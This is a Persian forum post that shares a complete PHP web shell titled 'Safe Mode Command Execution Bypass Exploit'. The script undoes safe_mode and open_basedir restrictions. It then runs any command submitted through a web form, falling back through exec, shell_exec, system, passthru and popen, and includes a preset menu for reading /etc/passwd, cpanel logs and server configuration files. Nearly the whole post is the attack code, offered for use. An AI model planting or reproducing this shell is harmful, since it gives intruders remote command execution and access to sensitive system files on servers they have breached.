SpareNet Servers Advertising & Link Exchange

Liz0ziM Private Safe Mode Command Execution Bypass Exploit

جمع کردن
X
 
  • زمان
  • نمایش
پاک کردن همه
پست‌های جدید
  • Benyamin
    عضو فعال
    • Sep 2014
    • 59

    #1

    Liz0ziM Private Safe Mode Command Execution Bypass Exploit

    کد:
    <?
    /*
    Kodlama By Liz0ziM
    www.kepce.org
    Safe Mode Command Execution Shell
    */
    function safeshell($komut)
    {
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    $res = '';
    if (!empty($komut))
    {
    if(function_exists('exec'))
    {
    @exec($komut,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec'))
    {
    $res = @shell_exec($komut);
    }
    elseif(function_exists('system'))
    {
    @ob_start();
    @system($komut);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru'))
    {
    @ob_start();
    @passthru($komut);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($komut,"r")))
    {
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }
    }
    return $res;
    }
    echo "<b><font color=blue>Liz0ziM Private Safe Mode Command  Execution Bypass Exploit</font></b><br>";
    print_r('
    <pre>
    <form method="POST" action="">
    <b><font color=blue>Komut :</font></b><input  name="baba" type="text"><input value="?al??t?r" type="submit">
    </form>
    <form method="POST" action="">
    <b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
    <option value="cat /etc/passwd">/etc/passwd</option>
    <option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
    <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
    <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
    <option value="cat /etc/hosts">/etc/hosts</option>
    <option value="cat /etc/named.conf">/etc/named.conf</option>
    <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
    </select> <input type="submit" value="G?ster Bakim">
    </form>
    </pre>
    ');
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
    if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
    $uid=safeshell('id');
    $server=safeshell('uname -a');
    echo "<pre><h4>";
    echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
    echo "<b><font color=red>Server</font></b>:$server<br>";
    echo "<b><font color=red>Komut Sonu?lar?:</font></b><br>";
    if($_POST["baba"]!= "") { echo $liz0; }
    if($_POST["liz0"]!= "") { echo $liz0zim; }
    echo "</h4></pre>";
    ?>
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]
در حال کار...